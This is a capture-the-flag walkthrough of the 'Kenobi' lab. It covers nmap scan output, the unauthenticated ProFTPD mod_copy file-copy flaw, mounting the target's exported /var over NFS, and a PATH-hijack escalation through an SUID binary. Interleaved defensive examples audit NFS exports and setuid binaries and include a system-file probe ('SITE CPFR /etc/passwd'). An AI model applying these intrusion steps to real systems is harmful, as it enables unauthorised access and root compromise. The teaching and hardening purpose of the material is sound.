This room covers accessing a Samba share, abusing a vulnerable version of ProFTPD to gain initial access, and escalating privileges to root via an SUID binary.
```
[email protected]:~# nmap -sV -sC --script vuln -oN kenobi 10.10.187.245
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-11 02:20 UTC
Nmap scan report for ip-10.10.45.140.eu-west-1.compute.internal (10.10.45.140)
Host is up (0.0013s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
|_sslv2-drown:
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /admin.html: Possible admin folder
|_  /robots.txt: Robots file
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      40361/tcp   mountd
|   100005  1,2,3      49262/udp   mountd
|   100021  1,3,4      43179/tcp   nlockmgr
|   100021  1,3,4      56568/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|_  100227  2,3         2049/udp   nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 02:F2:65:5B:D2:FA (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.90 seconds
```
The mod_copy module implements the SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
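For the defending side, here is a proftpd.conf fragment (an added example, not text from the original write-up and not configuration shipped by the ProFTPD project) that shows the exposed state beside the mitigated one. The `<Limit SITE_CPFR SITE_CPTO>` block is the documented mod_copy workaround; the `CopyEngine` line is an assumption that only applies to builds which provide that directive. Upgrading to a ProFTPD release that fixed the unauthenticated mod_copy behaviour is still the real fix, and this fragment is the stop-gap while that is scheduled.

```apacheconf
# Added example (not the write-up's own text and not ProFTPD project config).

# Exposed: mod_copy loaded (or compiled in) with nothing restricting the
# SITE copy commands, so any client that has connected can issue them.
LoadModule mod_copy.c

# Mitigated: same module, but SITE CPFR / SITE CPTO are denied to everyone.
# Use AllowUser / AllowGroup ahead of DenyAll only if a trusted account
# genuinely needs server-side copy.
LoadModule mod_copy.c
<Limit SITE_CPFR SITE_CPTO>
  DenyAll
</Limit>

# Assumption: where the build provides the CopyEngine directive
# (check `proftpd -l` for mod_copy and your version's documentation),
# the module can be switched off outright instead:
# CopyEngine off
```

Whichever form is used, verify it from an unauthenticated FTP session afterwards: `SITE CPFR /etc/passwd` should now be refused rather than answered with a "File or directory exists" style response.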
Earlier we saw that the target machine allows mounting its var directory, so we copy the key into /var.

Create a directory and remotely mount the target's var directory:

```
mkdir /mnt/kenobiNFS
mount 10.10.45.140:/var /mnt/kenobiNFS
```
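The mount works because the export is reachable from any client and covers a directory that holds user data and SSH material. The following script is an added example (not part of the original write-up) of the check a defender would run against the NFS server's own configuration: it parses an exports file and flags entries exported to everyone, entries with `no_root_squash`, and exports of sensitive paths such as /var. The exports file it reads is constructed inline for the demo; on a real host point the functions at /etc/exports (and anything under /etc/exports.d/).

```sh
#!/bin/sh
# Added example, not part of the original write-up: audit an NFS exports
# file for the kind of exposure used above (a sensitive directory such as
# /var exported to any client, often with root squashing disabled).
# The exports file below is constructed for the demo.

# audit_exports FILE
# Prints one line per risky export: "<path> <client> <reason[,reason...]>".
audit_exports() {
    sed -e 's/#.*//' "$1" | {
        set -f    # no globbing: a client spec of '*' must stay literal
        while read -r path clients; do
            [ -z "$path" ] && continue
            [ -z "$clients" ] && clients='*'   # no client list means everyone
            for spec in $clients; do
                client=${spec%%"("*}               # host/network before '('
                opts=${spec#"$client"}             # "(rw,no_root_squash)" or ""
                opts=${opts#"("}; opts=${opts%")"}
                reason=""
                case "$client" in
                    ''|'*') reason="exported-to-everyone" ;;
                esac
                case ",$opts," in
                    *,no_root_squash,*) reason="${reason:+$reason,}no_root_squash" ;;
                esac
                case "$path" in
                    /|/var|/var/*|/etc|/etc/*|/home|/home/*|/root|/root/*)
                        reason="${reason:+$reason,}sensitive-path" ;;
                esac
                [ -n "$reason" ] && printf '%s %s %s\n' "$path" "${client:-*}" "$reason"
            done
        done
    }
}

# count_risky_exports FILE -> number of risky export entries
count_risky_exports() {
    audit_exports "$1" | awk 'END { print NR }'
}

# Constructed sample exports file for the demo (not a real host's /etc/exports).
SAMPLE_EXPORTS=$(mktemp)
cat > "$SAMPLE_EXPORTS" <<'EOF'
# constructed sample
/var            *(rw,sync,no_root_squash)        # like the target above
/srv/share      10.0.0.0/24(ro,sync)             # scoped and root squashed
/home/backup    10.0.0.5(rw,sync,no_root_squash)
/srv/pub        *(ro,sync)
EOF

audit_exports "$SAMPLE_EXPORTS"
# /var * exported-to-everyone,no_root_squash,sensitive-path
# /home/backup 10.0.0.5 no_root_squash,sensitive-path
# /srv/pub * exported-to-everyone
rm -f "$SAMPLE_EXPORTS"
```

The fix on the server side is the inverse of each flagged reason: scope the export to the hosts that need it, keep `root_squash` (the default), and export a dedicated share directory rather than /var or a home tree. The same parser can be fed the output of `exportfs -v` on the server to audit the live table instead of the file.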
This shows us that the binary invokes these programs without a full path (curl and uname rather than /usr/bin/curl and /usr/bin/uname). Because the file runs with the root user's privileges, we can manipulate our PATH to gain a root shell.
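The same observation is what a defender should be hunting for: any setuid binary whose embedded command strings name a tool by bare name is resolved through the caller's PATH. The script below is an added example (not part of the original write-up) that pulls printable strings out of a file with only `tr`, `grep` and `awk`, so it does not depend on binutils' `strings`, and reports the ones that start with a common tool name and no leading slash. The tool list and the stand-in "binary" are constructed for the demo; extend the list for your own environment.

```sh
#!/bin/sh
# Added example, not part of the original write-up: find strings inside a
# setuid binary that invoke a helper tool by bare name ("curl -I ..." rather
# than "/usr/bin/curl -I ..."), i.e. calls resolved through the caller's PATH.
# The tool list is an assumption for the demo.

TOOLS='curl|wget|uname|id|ls|cat|ps|find|ifconfig|ip|netstat|ping|chmod|chown|cp|mv|rm|sh|bash'

# relative_tool_calls FILE
# Prints each printable string in FILE whose first word is one of $TOOLS and
# is not given as an absolute path.
relative_tool_calls() {
    tr -c '[:print:]' '\n' < "$1" \
        | grep -E "^($TOOLS)"'( |$)'
}

# count_relative_tool_calls FILE -> number of such strings
count_relative_tool_calls() {
    relative_tool_calls "$1" | awk 'END { print NR }'
}

# Sweep every setuid binary on the host (run as root so all of them are readable):
#   find / -perm -4000 -type f 2>/dev/null | while read -r f; do
#       n=$(count_relative_tool_calls "$f")
#       [ "$n" -gt 0 ] && printf '%s: %s relative tool call(s)\n' "$f" "$n"
#   done

# Constructed stand-in for a binary: a few bytes of junk plus the kinds of
# strings a system() call would embed.
DEMO=$(mktemp)
printf 'ELF\001\002\000junk\000curl -I localhost\000/usr/bin/uname -r\000uname -r\000/etc/passwd\000' > "$DEMO"
relative_tool_calls "$DEMO"
# curl -I localhost
# uname -r
rm -f "$DEMO"
```

A hit is not automatically exploitable (the binary may set PATH itself before the call), but it is the cue to read the code. The robust fix for the binary's author is to call helpers by absolute path, or to reset PATH to a fixed value such as `/usr/bin:/bin` and drop inherited environment before spawning anything, as the distribution's own setuid tools do.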